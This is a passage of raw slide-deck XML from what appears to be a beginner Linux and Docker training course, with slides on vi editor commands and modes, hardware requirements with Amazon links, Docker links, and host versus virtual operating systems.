                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>q</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Q</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>uit</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>dd</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Delete line</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="885" name="Google Shape;885;p154"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="898500" y="996675"/>
            <a:ext cx="7064400" cy="14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38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VI Editor have 2 modes</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Insert Mode           i</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command Mode   Esc</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="890" name="Google Shape;890;p155"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="30675" y="221600"/>
            <a:ext cx="9082650" cy="45413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pic>
        <p:nvPicPr>
          <p:cNvPr id="895" name="Google Shape;895;p156"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1094300"/>
            <a:ext cx="8520600" cy="2649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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pre-requisites</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Linux basics commands</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="7445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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>H/W </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Requirements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="906" name="Google Shape;906;p158"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1722325"/>
            <a:ext cx="8520600" cy="3308100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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 sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RAM 8GB (Min)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSD (512GB) (Yes)(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Primary</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OS)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HDD (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(Backup)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Core I3/i5/i7  -  5th/ 6th/7th Above</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU launch Year 2015+</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="7445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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Requirements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Google Shape;912;p159"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1722325"/>
            <a:ext cx="8520600" cy="3308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000"/>
              <a:t>RAM</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.amazon.in/Kingston-FURY-3200MHz-SODIMM-KF432S20IB/dp/B097TN561M/ref=sr_1_2_sspa?crid=LAKCLSUBS1D7&amp;keywords=kingston+fury+8gb+ddr4+3200&amp;qid=1690599032&amp;sprefix=kingston+fury+16gb+ddr4+3200%2Caps%2C197&amp;sr=8-2-spons&amp;sp_csd=d2lkZ2V0TmFtZT1zcF9hdGY&amp;psc=1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900"/>
              <a:t>SSD</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.amazon.in/Western-Digital-Internal-500GBfor-Performance/dp/B09ZYPTXS4/ref=sr_1_3?keywords=ssd%2Bwd%2Bblue%2B500gb&amp;qid=1690599227&amp;sprefix=ssd%2Bwb%2Bblue%2Caps%2C206&amp;sr=8-3&amp;th=1</a:t>
            </a:r>
            <a:endParaRPr sz="1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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386400" y="665900"/>
            <a:ext cx="8520600" cy="35331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b="1" lang="en" sz="4550" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.docker.com/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4766" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://hub.docker.com/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4766">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="4766">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2644" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.crunchbase.com/organization/docker</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2644">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481150" y="0"/>
            <a:ext cx="8520600" cy="139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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="923" name="Google Shape;923;p161"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1542600"/>
            <a:ext cx="8914376" cy="33516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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396425" y="296775"/>
            <a:ext cx="8520600" cy="139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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>perating System</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929" name="Google Shape;929;p162"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2018975" y="1989100"/>
            <a:ext cx="5741100" cy="1269900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396425" y="296775"/>
            <a:ext cx="8520600" cy="139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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="935" name="Google Shape;935;p163"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465275" y="2043875"/>
            <a:ext cx="8451900" cy="15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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Operating system create a virtual environment in the Host operating system</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="31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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396425" y="296775"/>
            <a:ext cx="8520600" cy="139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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201425" y="1817250"/>
            <a:ext cx="5570700" cy="1509000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-425450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396425" y="296775"/>
            <a:ext cx="8520600" cy="987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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941" name="Google Shape;941;p164"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1284675"/>
            <a:ext cx="8520600" cy="9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100">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
